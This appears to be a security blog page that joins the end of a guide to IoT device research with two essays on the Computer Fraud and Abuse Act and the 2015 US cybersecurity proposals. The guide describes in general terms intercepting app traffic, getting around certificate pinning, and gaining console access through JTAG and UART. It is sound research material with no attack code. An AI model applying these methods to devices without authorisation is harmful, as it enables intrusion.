Inside the application, try and look for interesting classes, hardcoded strings, and other details that may provide privilege over the device never intended by the developer. I've found hardcoded root credentials, API keys for Amazon Web Services, URLs never meant to be known to end-users, and manufacturing network configurations. There can be a treasure trove of details if you look intently enough and a lot of flexibility if you instrument against a live application and see how it operates.

 

If you're interested in learning beyond these basics, check out Android Hacker's Handbook and/or the iOS Hacker's Handbook for in-depth knowledge from some of the best minds on each of their respective platforms.

 

Screen Shot 2015-01-01 at 8.33.12 PM.png

Network Traffic

Once I've gotten into the mobile application and have seen what I can see, I like to start using the mobile application and begin interacting with the IoT device. This includes every step that I can witness, from setup to registration to normal usage. Using network analysis standbys such as mitmproxy, Wireshark, Burp Suite, and Ettercap, you can view connections from the mobile application to the device, and the device to the Internet. In many cases, you'll even be able to intercept SSL/TLS connections with little trouble using these types of tools. Some applications (and hopefully more in the future) utilize certificate pinning to thwart MITM attempts of encrypted connections, but of course there's always a way around that.

 

By combining knowledge you gained through looking at the mobile application with live traffic, you can quickly understand how this device functions at a network level and start diving deeper into how it performs authentication, transport security, what inputs the components take, how outputs are rendered, platforms & frameworks being leveraged, and even see data that the developer perhaps never intended you to see. Whether web or mobile, applications often leak data unintentionally by developers who failed to scope a database lookup tightly enough, or send data over before it should have been sent. Whether by design or mistake, API calls and the resulting outputs can lead to some interesting findings.

 

Beyond simple network traffic, interception can actually lead to entire firmware images for the device. While older technologies may have required users to plug in a USB device with a firmware image loaded, IoT is heavily driven on over-the-air upgrades, often via Wi-Fi or cellular networks. Due to this, vendors aren't as likely to widely publish their firmware on FTP sites like you may have been used to with your older home routers. By observing network traffic at the right moment (e.g. user-requested firmware checks, vendor-pushed updates), analysis can lead to either downloading the entire firmware image while it's in transit, or a URL that contains firmware images when your device checks for updates.

 

Embedded Hardware

IMG_0800.jpg

Investigating an IoT device's actual hardware can be quite beneficial to research, especially if you were unable to acquire the firmware via other methods. Further, physical access can quite often lead to administrative console access, giving a direct method to explore the operating system, applications, and configuration in a running environment. While an occasional device may provide network services like SSH or Telnet to connect to it, the credentials to login are rarely provided to end users. Thus, hardware may be one of the only ways to really gain hands-on access to the environment powering your research project's device. There are a number of standards related to hardware debugging that can lead to physical interaction with a device, such as JTAG and UART. Well known hardware hacking tools such as the Bus Pirate open up a new world of IoT research possibilities using these protocols and more.


In the case of JTAG, finding pins could provide deep access to the hardware, including capabilities to dump memory or halt the chipset. Because analyzing test points of hardware

to find the appropriate pins can be time consuming, Joe Grand created a device called the JTAGulator, which automates this process for both JTAG and UART. While JTAGulator is great at identifying JTAG pins, it doesn't really do much with JTAG beyond basic sanity checks. I personally have a SEGGER J-Link that has numerous tools to interact with JTAG on IoT devices, allowing for tasks such as dumping memory via GDB.

 

While JTAG is made for deep, powerful control of hardware components, UART often provides a simple serial console connection to the device's operating environment. With either your existing JTAGulator, or a simple FTDI USB serial cable, software like minicom or screen is all that's needed to interact with a UART connection. Once connected via UART, a researcher can investigate the device from the inside-out, executing applications locally, exploring configuration files, and looking for new avenues of exploitation. While being able to download firmware, or dump memory, or analyze network traffic is hugely important, being able to work in the actual device's operating environment can be a major foothold in understanding how the device is working.


Lastly, if you're still struggling to find firmware images, you may be lucky enough to have a device where the flash can be physically accessed with a testing clip for SOIC packages. A tool such as flashrom can easily leverage a device that speaks SPI to pull the firmware directly off of the flash while still attached to the device. I've personally had a great experience with Xipiter's custom device called the Shikra to pull firmware using flashrom when other tools had failed to get a clean dump of the image. Even better, Shikra also speaks UART and JTAG, too!


Wireless Communications

stick.gif

One reason why IoT is so capable to amaze us is through a distinct lack of network tethering. Without the need for thousands of feet of CAT-6 or serial cables laying around, IoT is able to exist in the form of everything from IP cameras to tiny water sensors. Today, standards like Wi-Fi, Bluetooth Low Energy (BLE) and ZigBee have changed what is possible over the air, enabling IoT innovators to continue to realize their creativity. Much like the other areas I've discussed, a special world of technologies exist to enable researchers to better understand the usage of these wireless protocols as the glue holding IoT function together.


Long-time Wi-Fi hackers are probably quite familiar with software like Kismet, but they may not realize that Kismet can do more than just Wi-Fi. In fact, using hardware such as an Ubertooth One, Kismet can provide Bluetooth capabilities to researchers. Alternatively, there are a number of Ubertooth tools capable of providing insight into Bluetooth traffic. If, however, you're more interested in ZigBee, Joshua Wright's KillerBee framework can be combined with an Atmel Raven USB to have a powerful assessment toolkit in a small form factor. Lastly, If you're really not playing around, a HackRF provides software defined radio (SDR) functionality that won't let you down.


IoT is a Fabric of Technologies

If you've been reading this post, you may be thinking, "...this just seems like a lot existing technologies all bundled together..." -- bingo! You're all-but-guaranteed to have a broad experience in technologies, protocols, and platforms by diving into an IoT security research project. Due to the nascency of IoT, there are very few standardized aspects of a device you'll encounter, ensuring a fairly unique and exciting experience. Perhaps more intriguing is the reality that the research you perform could have a lasting impact on the direction that IoT moves by guiding vendors to make more secure choices.


One such initiative to help guide IoT down a safer path is called BuildItSecure.ly. By creating opt-in relationships with IoT vendors, small and large, the researchers at BuildItSecure.ly can help to inform and influence the decisions being made by the very innovators you're waiting to release their next product. Vendors such as Dropcam, Pinoccio, Belkin, and Wink have all joined the initiative to work with world-class security researchers to make sure their products are more secure. While I am biased due to being a co-founder of the year-old initiative, I have to say that this sort of effort is exactly the kind of goodwill relationship that the research community needs more of and I'm proud to see it resonating with those familiar.

 

I hope that this blog post has helped to inform you of the burgeoning world of IoT security research and that you'll decide to make one of the many devices out there a focus for your next project.

jazzyjeff.jpgAnyone who read my breakdown on the President’s proposal for cybersecurity legislation will know that I’m very concerned that both the current version of the Computer Fraud and Abuse Act (CFAA), and the update recently proposed by the Administration, have and will have a strong chilling effect on security research. You will also know that I believe that the security community can and must play a central role in changing it for the better. This post is about how we do that.

 

A quick recap

The CFAA is currently worded in a very vague way that not only creates confusion and doubt for researchers, but also allows for a very wide margin of prosecutorial discretion in the way the statute is applied.  It contains both criminal and civil actions, the penalties for which are pretty harsh, and that increases the severity of the risk for researchers. Too often, we see the CFAA being used as a stick to threaten researchers by companies that are not willing or able to face up to their responsibilities, and don’t want to be publicly embarrassed for not doing so. These factors have resulted in many researchers deciding not to conduct or disclose research, or being forced into not doing so.

 

The new proposal is potentially worse. It makes the penalties even harsher and, while it does attempt to create more clarity on what is or is not fair game, it is worded in such a way that a great deal of research activity could be subject to legal action. For more details on that, look at the other post.

 

Still, I believe that opening the CFAA for discussion is A Good Thing. It affords us an opportunity to highlight the issues and propose some solutions.  This latter part is where we stumble; we are frequently more comfortable pointing out weakness and failures than recommending solutions. We must move beyond this if our industry is to survive, and if we ever hope to create a more secure ecosystem.

 

While I believe everyone will pay the price if we cannot solve this problem – in the form of an inherently insecure ecosystem that threatens our privacy, our economy, and potentially our safety – the more immediate risk of imprisonment or other penalties is carried by researchers. In other words, no one is going to care more about this issue or be more motivated to fix it than us.

 

So how do we do that?

I've spent the past year asking and being asked that question, and unfortunately my answer right now is that I don’t know. Most people I know in the community agree with the basic premise of having an anti-hacking law of some kind, and we need to be careful that any effort to decriminalize research does not inadvertently create a backdoor in the law for criminals to abuse.

 

Finding a solution is tough, but I have faith in the extraordinary perseverance and intelligence of our community, and I believe together we can find a solution. That sounds like a cheesy cop out. What I mean is that while I don’t know in technical detail all the possible use cases that will test the law, I know great researchers that live them every day. And while I don’t know how to write law or policy, I know smart, experienced lawyers that do, and that care about this issue. And though I’m learning how to navigate DC, there are amazing people already well-engaged there that recognize the problem and advocate for change. Collaboration then is the key.

 

Getting started

As I said, I've spent a lot of time discussing this problem and potential solutions and I thought sharing some of that thought process might help kick start a discussion – not on the problem, but on a potential solution.

 

What we’re likely looking at here is an exemption or “carve out” to the law for research. Below are some ways we might think of doing that, all of which have problems – and here I am guilty of my own crime of flagging the problem without necessarily having a solution. Hopefully though this will stimulate discussion that leads to a proposed solution.

 

A role-based approach

One of the most common suggestions I've heard is that you exempt researchers based expressly on the fact that they ARE researchers. There are a few problems with this. Firstly, when I use the term “researcher” I mean someone that finds and discloses a security flaw. That could be a security professional, but it could just as easily be a student, child, or Joe Internet User who unintentionally stumbles on an issue while trying to use a website. People reporting findings for the first time have no way of establishing their credibility. Defining researchers is tough and likely defeats its own purpose.

 

I’ve heard the idea of some kind of registration for researchers be kicked around, and those outside the community will often point to the legal or medical professions where there is a governing body within the community that sets a mutually agreed bar and polices it. I can feel many shuddering as they read that – ours is not a community that enjoys the concept of conformity or being told what to do. Even if that evolves over time, registration and self-government don’t address the point above that ANYONE can be a researcher in the sense of uncovering a vulnerability.

 

Then too there is the sad fact that some people may work as “white hat” security professionals during the day, but by night they wear a different colored hat altogether (or a balaclava if you believe the stock imagery strewn across the internet). If they commit a crime they should be punished for it accordingly and should not have a Get Out of Jail Free card just because they are a security professional by day.

 

A behavior-based approach

Perhaps the easiest way to recognize research then is through behavior. There may be a set of activities we can point to and say “That is real research; that should be exempt.”

 

The major challenge with this is that much researcher behavior may not be distinguishable from the initial stages of an attack. Both a researcher and a criminal may scan the internet looking to see where a certain vulnerability is in effect. Both a researcher and a criminal may access sensitive personally identifiable information through a glitch on a website. It seems to me that what they do with that information afterwards would indicate whether they are a criminal or not, and as an aside, I would have thought most criminal acts would be covered by other statutes, eg. theft, destruction of property, fraud. This is not how this law currently works, but perhaps it merits further discussion.

 

A problem with this could be that you would have to consider every possible scenario and set down rules for it, and that’s simply not feasible. Still, I think investigating various scenarios and determining what behavior should be considered “safe” is a worthwhile exercise. If nothing else, it can help to clarify what is risky and what is not under the current statute. Uncertainty over this is one of the main factors chilling research today.

 

This could potentially be addressed through an effort that creates guidelines for research behavior, allowing for effective differentiation between research and criminal activity. For example, as a community we could agree on thresholds for the number of records touched, number of systems impacted, or communication timelines. There are challenges with this approach too – for one thing we don’t have great precedents of the community adopting standards like this. Secondly, even if we could see something like this endorsed by the Department of Justice and prosecutors, it would not protect researchers from civil litigation.  And then there is the potential of forcing a timeline for self-identification, which would raise the likelihood of incomplete or inconclusive research, and the probability of “cease and desist” notifications over meaningful and accurate disclosures.

 

A disclosure-based approach

This again is about behavior, but focused exclusively around disclosure. The first challenge with this stems from that fact that anyone can be a researcher. If you stumble on a discovery, can you be expected to know the right way to disclose? Can you expect students and enthusiasts to know?

 

Before you get to that though, there is the matter of agreeing on a “right” way to disclose. Best practices and guidelines abound on this topic, but the community varies hugely in its views between full, coordinated, and private disclosures. Advocates of full disclosure will generally point to the head-in-the-ground or defensive response of the vast majority of vendors – unfortunately companies with an open attitude to research are still the exception, not the norm. And those companies are not the ones likely to sue you under the CFAA.

 

This does raise one interesting idea – basing the proposal not just on how the researcher discloses, but also on how the vendor responds. In other words, a vendor would only be able to pursue a researcher if they had also satisfied various requirements for responding to the disclosure. This would at least spread the accountability so that it isn’t solely on the shoulders of the researcher. Over time it would hopefully engender a more collaborative approach and we’d see civil litigations against researchers disappear.  This is the approach proposed in a recent submission for a security research exemption to the Digital Millennium Copyright Act (DMCA).

 

An intent-based approach

This brings me to my last suggestion, and the one that I think the Administration tried to lean towards in its latest proposal.

 

One of the criticisms of the current CFAA has long been that it does not consider intent.  That’s actually a bit of an over-simplification as it is always the job of the prosecutor to prove that the defendant was really up to no good. But essentially the statute doesn’t contain any actual provision for intent, or mens rea for those craving a bit of Latin.

 

This is the point at which I should remind you that I’m not a lawyer (I don’t even play one on TV). However, to the limited degree that I understand this, I do want to flag that the legal concept of intent is NOT the same as the common usage understanding of it. It’s not enough to simply say “I intended X.” or “I didn’t intend Y” and expect that it will neutralize the outcome of your actions.

 

Still, I’ve been a fan of an exemption based on intent for a while because, as I’ve already stated: 1) anyone can be a researcher, and 2) some of the activities of research and cybercrime will be the same. So I thought understanding intent was the only viable way to demarcate research from crime. It’s a common legal concept, present in many laws, hence there being a nice Latin term for it.  And in law, precedent seems to carry weight, so I thought intent would be our way in.

 

Unfortunately the new proposal highlights how hard this is to put into practice. It introduces the notion of acting “willfully”, which it defines as:

 

“Intentionally to undertake an act that the person knows to be wrongful.”

 

So now we have a concept of intent. But what does “wrongful” mean?  Does it mean I knowingly embarrassed a company through a disclosure, potentially causing negative impact to revenue and reputation? Does it mean I pressured the company to invest time and resources into patching an issue, again with a potential negative impact to the bottom line? If so, the vast majority of bona fide researchers will meet the criteria set out above to prove bad intent, as will media reporting on research, and anyone sharing the information over social media.

 

This doesn’t necessarily mean we should just abandon the idea of an intent-based approach. The very fact that the Administration introduced intent into their proposal indicates that there may be merit to pursuing this approach.  It could be a question of needing to fine-tune the language and test the use cases, rather than giving up on it altogether.  We may have the ability to clarify and codify what criteria demonstrates and documents good intent. What do you think?

 

Next steps

It’s time the security research community came up with its own proposal for improving the CFAA. It won’t be easy; most of us have never done anything like this before and we probably don’t know enough Latin. But it’s worth the effort of trying. Again, researchers bear the most immediate risk. And researchers are the ones that understand the issues and nuances best. It falls to this community then to lead the way on finding a solution.

 

The above are some initial ideas, but this by no means exhausts the conversation. What would you do? What have I not considered? (A lot certainly.) How can we move this conversation forward to find OUR solution?

 

~ @infosecjen

Last week, President Obama proposed a number of bills to protect consumers and the economy from the growing threat of cybercrime and cyberattacks. Unfortunately in their current form, it’s not clear that they will make us more secure. In fact, they may have the potential to make us more INsecure due to the chilling effect on security research. To explain why, I’ve run through each proposed bill in turn below, with my usual disclaimer that I’m not a lawyer.


Before we get into the details, I want to start by addressing the security community’s anger and worry over the proposal, particularly the Law Enforcement Provisions piece. The community is right to be concerned about the proposals in their current form, but there is some good news here, and an important opportunity for both the Government and the security community.


Firstly, it’s a positive sign that both the President and Congress are prioritizing cybersecurity and we're seeing scrutiny and discussion of the issues. There seems to be alignment between the Government and the security community on a few things too: for example, I think we agree that there needs to be more collaboration and transparency, and a stronger focus on preventing and detecting cyberattacks. Creating consistency for data breach notification is also a sensible measure.


Lastly, I’m excited to see the Computer Fraud and Abuse Act (CFAA) being opened for updating. Yes, the current proposal raises a number of serious concerns, but so does the version that is actively being prosecuted and litigated today. The security research community has wanted to see updates to the CFAA for a long time, and this is our opportunity to engage in that process and influence legislators to make changes that really WILL make us more secure.


The Critical Role of Research

One thing I want to applaud in the President’s position is the focus on prevention. Specifically, the Administration is advocating sharing information on threat indicators to create best practices and help organizations mount a defense. This is certainly important. Understanding attackers and their methods is something we talk about a great deal at Rapid7, and we definitely agree it’s a critical part of a company’s security program.


If we want to prevent attacks though, we need to do and know more. Opportunities for attackers abound across the internet within the technology itself, making effective defense an almost impossible task. Addressing this requires a shift in focus so we are building security into the very fabric of our systems and processes. We need flaws, misconfigurations, and vulnerabilities to be identified, analyzed, discussed, and addressed as quickly as possible. This is the only way we can meaningfully reduce the opportunity for attackers and increase cybersecurity.


Yet, at present, we do not encourage or support researchers and enable them to be effective. Rather, legislation like the CFAA creates confusion and fear, discouraging research efforts. Too often we see companies use this and other legislation as a stick to threaten (or beat) researchers with.


(One thing to note here is that when I use the term “researcher,” I am referring variously to security professionals, enthusiasts, tinkerers, and even Joe Internet User, who accidently stumbles on a vulnerability or misconfiguration discovery. It’s not easy to define what a security researcher is, which is one of the challenges with building a legislative carve out for them.)


The defensive position described above is generally driven by conscientious business concerns for stability, revenue, reputation and corporate liability. Though understandable, in the long term this approach only increases the risk exposure for the business and their customers. We need to change this status quo and create more collaboration between security experts and businesses if we want to prevent and effectively respond to cyberattacks.


Updating the Computer Fraud and Abuse Act

There’s a lot to discuss in the CFAA proposal, much of which raises concerns, so I’m just going to go through it all in turn as it appears in the proposal.


  • SEC 101 - Prosecuting Organized Crime Groups That Utilize Cyber Attacks


This is actually an amendment to the Racketeer Influenced and Corrupt Organizations Act (RICO), which basically allows for the leaders of a criminal organization to be tried for the crimes undertaken by others within that enterprise. The amendment proposed adds violations of the CFAA (1030) as acts that can be subject to RICO. The concern with this is that the definition of “enterprise” is incredibly broad:

 

“Enterprise” includes any individual, partnership, corporation, association, or other legal entity, and any union or group of individuals associated in fact although not a legal entity;

 

The security industry is built on interaction and information sharing in online communities. We help each other tackle difficult technical challenges and make sense of data on a regular basis. If this work can be interpreted as an act of conspiracy, it will undermine our ability to effectively collaborate and communicate.

 

For a more specific example, let’s consider Metasploit, which is an open source penetration testing framework designed to enable organizations to test their security against attacks they may experience in the wild. Rapid7 runs Metasploit, so if a Metasploit module is used in a crime, would that make the leadership of Rapid7, a party to that crime? Would other Metasploit contributors also be implicated? This concern is just as valid for any other open source security tool.

 

  • SEC 103 – Modernizing the Computer Fraud and Abuse Act

 

(a)(2)(B) – In response to requests from the legal and academic communities, and circuit splits over prosecutions, this amendment aims to clarify that a violation of Terms of Service IS a crime under the CFAA if the actor:

a2B.png

This is a big concern. Firstly, there is a general sense of disquiet over the idea of businesses being able to set and amend law as easily as they set and amend Terms of Service.

 

From a security research point of view though, there is more to why this is concerning. It is highlighted in the definitions section:

Authorized access.PNG.png

This essentially means any research activity a business does not like becomes illegal. And you have to know the organization has banned it. Now while that does create a burden on the organization to state this (in their Terms of Service), it effectively means the end of internet-wide scanning efforts, which can be hugely valuable in identifying threats and understanding the reach and impact of issues.

 

The qualifiers are supposed to address this point, but do little to help. An organization can easily claim that the value of information uncovered in a research effort was more than $5,000.  And government systems will, and should be, included in an internet-wide research effort.

 

(a)(6) – This is another area of serious concern:

CFAA clip.png

There are four key parts to this:

1) “Willfully” – Interestingly, this word seems to be the Administration’s attempt to introduce intent as a means of drawing a line between criminal acts and those that might appear the same but are actually bona fide. In other words, this piece might be key to separating research from criminal activity. 


The problem lies in the definition of “willfully,” and the concept of “prosecutorial discretion”. The amendment defines “willfully” as follows:

"Intentionally to undertake an act that the person knows to be wrongful”

 

Unfortunately this definition begs for another definition. What does “wrongful” mean? A company embarrassed by a research disclosure could argue that the researcher intentionally caused injury to its reputation and customer confidence and was therefore wrongful.

 

Regarding “prosecutorial discretion” – there are a lot of prosecutors, and they vary greatly in their level of technical and security understanding, and their reasons for pursuing cases. It’s the anomaly cases – the occasional extremes of questionable prosecutions – that drive the most press coverage, giving a somewhat distorted view of the idea of prosecutorial discretion in the security community. As a result, there is little trust between prosecutors and security researchers, and it only takes the POSSIBILITY of prosecution for research to be chilled. In addition, the CFAA is both criminal and civil legislation, and we have seen motivated organizations take a more aggressive approach with their application of this law. 

 

2) “Traffics” – this word is incredibly broadly defined. For example, in his blog post on the CFAA proposal, security researcher Rob Graham imagines a scenario in which an individual could be prosecuted for retweeting a tweet containing a link to data dump. Coupled with the lack of clarity around having an intent to do wrong, there is a concern that the security community will be penalized purely for being inherently snarky, highly active on the internet, and interested in security information.

 

3) “Any other means of access” – In some cases this could refer to the public disclosure of a vulnerability as it could be argued that provides a “means of access”.  If a researcher provides a proof of concept exploit for the vulnerability to highlight how it works, this would very likely be considered a means of access, likewise with exploit code provided for penetration testing purposes. This language effectively makes research disclosure pretty much illegal.

 

4) “Knowing or having reason to know that a protected computer would be accessed or damaged without authorization” – You can make an argument that anyone in the security community always has this knowledge. We know that there are cybercriminals and that they are attacking systems across the internet. If we disclose research findings, we know that some criminals may try to use them to their advantage, but we believe many are ALREADY using the vulnerability to their advantage without security professionals having a chance to defend against them. This is why disclosure is so important – it enables (sometimes forces) issues to be addressed so organizations can protect themselves and their customers.


(c) – Penalties.  The amendment increases the penalties for CFAA violations. For researchers concerned about the issues above, the harsher penalties increase the risk and further discourages them from undertaking research or disclosing findings.


So all in all, there are some serious concerns in the CFAA, which can be summarized as it potentially chilling security research to such a degree that it would seriously undermine US businesses and the internet as a whole. That sounds melodramatic, and perhaps it is, but I’ve heard from a great many researchers that the proposal would stop them conducting research altogether. The risk level would simply be too great.


One challenge with finding the right approach for the CFAA is that research often looks much like nefarious activity and it’s hard to create law that allows for one and criminalizes the other. This is a challenge we MUST address.


The Personal Data Notification and Protection Act

We see a similar problem emerge with the Personal Data Notification and Protection Act, which aims to create consistency and clarity around breach notification requirements across the entire country (as currently there are different laws on this in 47 individual States). The challenge here again resides in where research may look like a breach.


If a researcher accesses SPII in the course of finding and investigating a vulnerability, then once disclosed to the business in question, the company will need to go through the customer disclosure process. In order to protect themselves from this, we could see organizations discouraging researchers from testing their systems by taking a hard line stance that they will be prosecuted.


Apart from this concern, I’m generally supportive of creating consistency for breach notification requirements. This has been needed for a while and it should help both businesses and consumers to better understand their rights and what is expected of them in the case of a security incident.


The specifics of the bill look reasonable: 30 days for notification from discovery of the incident is not optimal, but is OK. The terms laid out for exemptions and the parameters on the kind of data that represents SPII seem fair. I do agree though with the EFF’s assertion that it would be better if this law were:“A ‘floor,’ not a ‘ceiling,’ allowing states like California to be more privacy protective and not depriving state attorneys general from being able to take meaningful action.”


Information Sharing

The emphasis on transparency of the breach notification piece was also present in an Information Sharing proposal; the latest in a long line of bills focused on encouraging the private sector to share security information with the Government. This proposal specifically asks for “cyber threat indicator” information to be shared via the National Cybersecurity and Communications Integration Center (NCCIC), and offers limited liability as an inducement.


This feels like the least impactful of the three bills to me. It’s a voluntary program and offers no hugely compelling incentive for participation, other than liability limitation. This supposes that the only barrier to information sharing currently is fear of liability, and I’m not convinced that’s accurate. For example, it’s often the case that organizations don’t know what’s going on in their environment from a security point of view, and don’t know what to look for or where to start. A shortage of security skills exacerbates this problem.


In addition, while I do think sharing this kind of information is potentially very valuable, I’m not convinced that doing so through the Government is the most efficient or effective way to realize this value, and I definitely don’t think it promotes collaboration between security and business leaders. In fact, I’m concerned that it could create a privileged class of information that is tightly controlled, rather than open and accessible to all. 


One thing this proposal does raise for me though is a question around liability.  At present, in the relationship between a vendor and researcher, all the liability rests on the shoulders of the researcher (and this weight increases under the new CFAA proposal). They carry all the risk and one false move or poorly worded communication and they can be facing a criminal or civil action. The proposed information sharing bill doesn’t address that, but it got me thinking… if the Government is prepared to offer limited liability to organizations reporting cybersecurity information, perhaps it could do something similar for researchers disclosing vulnerabilities….


Will the President’s Cybersecurity Proposal Make Us More Secure?

If you’ve stuck with me this far, thank you and well done. As I said at the start of this piece, it’s good to see cybersecurity being prioritized and discussed by the Government. I hope something good will come of it, and certainly I think data breach notification and information sharing are important positive steps if handled correctly.


But as I’ve stated numerous times through this piece, I believe our best and only real chance for addressing the security challenge is identifying and fixing our vulnerabilities. The bottom line is that we can’t do that if researchers don’t want to conduct or disclose research for fear of ending up in prison or losing their home.


Again, it's important to remember that these are only the initial proposals and we're now entering a period of consultation where various Congressional and Senate committees will be looking at the goals and evaluating the language to see what will work and what won't.


It's critical that the security community participates in this process in a constructive way. We need to remember that we are more immersed in security than most, and share our expertise to ensure the right approach is taken. We share a common goal with the Government: improving cybersecurity. We can only do that by working together. 

 

Let me know what you think and how you're getting involved.


@infosecjen

Filter Blog

By date: By tag: